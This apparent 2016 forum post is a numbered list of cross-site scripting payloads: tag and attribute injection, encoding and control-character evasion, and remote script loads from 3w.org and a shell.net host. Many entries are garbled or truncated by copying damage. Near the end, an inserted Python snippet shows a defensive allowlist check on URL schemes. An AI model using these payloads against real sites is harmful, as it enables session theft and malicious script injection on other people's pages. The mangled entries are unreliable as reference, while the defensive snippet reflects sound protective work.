
XSS attack summary

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert(‘XSS’)>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert(“XSS”)>

(6) Malformed IMG tag
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>
(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(15) Multi-line embedded JavaScript injection; this is an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>

(17) Null character
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere they can be used
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert(“XSS”);//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\”;alert(‘XSS’);//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

(33) BODY tag
<BODY(‘XSS’)>

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

(38) Remote style sheet
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

(39) List-style-image
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

(45) TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

(46) DIV background-image
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(48) DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>

(49) STYLE attribute with a split expression
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

(50) Anonymous tag with STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

(51) STYLE background-image
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE
exppression(alert(“XSS”))’>

(53) STYLE background
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

(54) BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
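A defender-side check for the encoding and control-character evasions listed above (items 4, 5, 8 to 14, 17 and 19), added here as an example and not part of the original post: it normalises a src/href/background attribute value the way a browser does before it reads the scheme, then applies a scheme allowlist rather than a keyword blocklist, which is why the case, tab, newline, null-byte and numeric-entity variants all collapse to the same rejected value. The ignored-character set and the allowlist are assumptions of this example.

```python
import html
import re

# Characters a browser discards or tolerates while parsing a URL scheme: ASCII control
# characters (NUL, tab, LF, CR, ...) and spaces. This set is an assumption of the example.
_IGNORED = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")
# Allowlist of schemes we are willing to emit in src/href/background attributes (assumed).
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def normalize_url_value(value: str) -> str:
    """Decode HTML character references (with or without ';'), drop ignored chars, lowercase.

    After this step 'JaVaScRiPt:', 'jav&#x09;ascript:', 'java\\0script:' and a fully
    &#...;-encoded 'javascript:' all compare equal, which is what the browser sees.
    """
    decoded = html.unescape(value)
    return _IGNORED.sub("", decoded).lower()


def url_scheme(value: str) -> str:
    """Scheme of an attribute value after normalisation, or '' for a scheme-less (relative) URL."""
    match = _SCHEME.match(normalize_url_value(value))
    return match.group(1) if match else ""


def is_allowed_url(value: str) -> bool:
    """Allowlist check: accept only known schemes or same-origin relative paths."""
    scheme = url_scheme(value)
    if scheme:
        return scheme in ALLOWED_SCHEMES
    # No scheme at all: a relative path. Protocol-relative '//host/...' is still cross-origin.
    return not normalize_url_value(value).startswith("//")


if __name__ == "__main__":
    # Constructed samples modelled on the vectors above; none is copied from the post.
    samples = [
        "JaVaScRiPt:alert(1)",
        "jav&#x09;ascript:alert(1)",
        "java\x00script:alert(1)",
        "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert(1)",
        "   javascript:alert(1)",
        "https://example.invalid/logo.png",
        "/images/logo.png",
    ]
    for sample in samples:
        print(f"{sample!r:70} scheme={url_scheme(sample)!r:14} allowed={is_allowed_url(sample)}")
```

A blocklist that looks for the literal string "javascript:" misses every one of the first five samples; matching on the normalised scheme catches them all.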
2 `9 f4 ~' e" B6 R: Z